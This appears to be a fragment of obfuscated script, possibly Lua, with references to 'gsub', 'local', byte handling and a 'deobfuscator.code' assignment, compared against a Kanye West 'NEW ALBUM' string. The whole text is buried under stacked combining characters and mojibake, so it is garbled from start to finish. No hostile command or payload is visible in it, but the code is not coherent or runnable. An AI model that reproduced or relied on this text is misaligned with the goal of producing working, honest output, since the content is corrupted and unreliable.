ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì´Í—ÌŽÌÌ‹ÌšÌ½Í•Í‰Ì¹ÍœÍœÌ¬Ì»mÌ¶Í›Ì»Ì–Ì¼Ì«ÌŸÌ¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì·ÍŠÌ‘ÌÌ½Ì‚Ì ÌŸÌ—Ì­Ì®Ì§Ì¹Ì¹Ì˜Í”wÌ¸Í›Í‘Ì‰Í˜Ì¨Ì§Ì Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌ,Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­.$Ì·Í›Í‚ÍÌ†ÍÍÌ’Í’Ì¦NÌµÌŠÍ—Ì¾ÍŠÍ„ÍŽÌ·Ì‘Í‚Ì Ì¢Í‰Ì£ÌžÌ°ÍÌ«EÌµÍÌ³ÌºÍÌ£ÌžÌ­Í”ÍÌ¢ÍˆÌµÌ‡ÍŠÌˆÍ’Ì¹Ì Ì¦Ì±Ì°Ì Ì¦WÌ´Í‚ÍÌŒÌ½Ì¾Ì€Ì–Í“ÌºÌ¯Ì™Ì¶ÌƒÌÌ³ÌºÍšÌªÍ‰Ì©AÌ¸Í Ì”ÌÍ™Ì°Ì«ÌžÌ·Í‘Í—ÌªÌ§ÌœÍ”ÍˆÌÌ­LÌ´Ì„Ì”ÌÌÍ‹ÌŒÍ‚ÌÍ“Ì™ÍœÌ¡Ì£ÍŽÌ®Ì°Ì¶Ì€Í„Ì•ÌÍ—Ì›ÌÌ¬Ì¹Ì—Ì²Ì­Í‡Í–BÌµÌƒÍŒÌ•Í˜Ì¹Í–Ì²Í‰Í–Í•Ì¸Ì‡Í‚Ì©Í…Í•ÍˆÌ²Ì³Ì³ÍŽÍ”Ì UÌ·Í˜Ì½ÌŒÌˆÍÍŽÍ™Ì·Í˜ÌšÌ­MÌ¶Í˜Í‚ÍÌ­ÌªÍ‰ÌºÌ¬Ì£Í“$,gÌµÍÌ‘ÍÌ¿Í‘ÍˆÌœÌ³Ì¹ÌžÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹;Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢_Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­[Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨], Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥ [ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì´Í—ÌŽÌÌ‹ÌšÌ½Í•Í‰Ì¹ÍœÍœÌ¬Ì»mÌ¶Í›Ì»Ì–Ì¼Ì«ÌŸÌ´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥Ì·ÍŠÌ‘ÌÌ½Ì‚Ì ÌŸÌ—Ì­Ì®Ì§Ì¹Ì¹Ì˜Í”wÌ¸Í›Í‘Ì‰Í˜Ì¨Ì§Ì Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌ,Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­] == "Ì·Í›Í‚ÍÌ†ÍÍÌ’Í’Ì¦NÌµÌŠÍ—Ì¾ÍŠÍ„ÍŽÌ·Ì‘Í‚Ì Ì¢Í‰Ì£ÌžÌ°ÍÌ«EÌµÍÌ³ÌºÍÌ£ÌžÌ­Í”ÍÌ¢ÍˆÌµÌ‡ÍŠÌˆÍ’Ì¹Ì Ì¦Ì±Ì°Ì Ì¦WÌ´Í‚ÍÌŒÌ½Ì¾Ì€Ì–Í“ÌºÌ¯Ì™ Ì¶ÌƒÌÌ³ÌºÍšÌªÍ‰Ì©AÌ¸Í Ì”ÌÍ™Ì°Ì«ÌžÌ·Í‘Í—ÌªÌ§ÌœÍ”ÍˆÌÌ­LÌ´Ì„Ì”ÌÌÍ‹ÌŒÍ‚ÌÍ“Ì™ÍœÌ¡Ì£ÍŽÌ®Ì°Ì¶Ì€Í„Ì•ÌÍ—Ì›ÌÌ¬Ì¹Ì—Ì²Ì­Í‡Í–BÌµÌƒÍŒÌ•Í˜Ì¹Í–Ì²Í‰Í–Í•Ì¸Ì‡Í‚Ì©Í…Í•ÍˆÌ²Ì³Ì³ÍŽÍ”Ì UÌ·Í˜Ì½ÌŒÌˆÍÍŽÍ™Ì·Í˜ÌšÌ­MÌ¶Í˜Í‚ÍÌ­ÌªÍ‰ÌºÌ¬Ì£Í“" Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢Ì·ÌÌ“Í’ÍŒÍ Ì¨Ì»fÌ¸Í„Í›ÌœÍˆÍ•Ì© {Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹Ì·ÌÌ“Í’ÍŒÍ Ì¨Ì»fÌ¸Í„Í›ÌœÍˆÍ•Ì©Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥.ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ = Ì¶Ì‚Í„ÌÌŽÍ›ÌÍ‹Ì›Í„Ì³Ì²ÌÌ Í“Í–OÌ·ÌÌ‰Ì„ÌŽÌˆÍÌªÌ®Ì¤Ì¢Ì¥ÌºÌ°Ì°ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢ÌµÌ†Ì…ÌÌ—Ì™Ì Ì­Ì˜SÌ¶ÌÍ†Ì¿Ì†Í€Ì ÌžÌ˜Ì¦Ì¯Ì¼Ì£Ì¥Ì©Ì®Ì·Í’Ì€Ì¥Í‰Ì ÍŽÌ°ÍšÌ¯Í”hÌ·Ì’Í“ÍœÌ«Ì¬ÍšÌ¹Í“Í…Ì¢Ì²Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­Ìº_Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦,Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨.ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—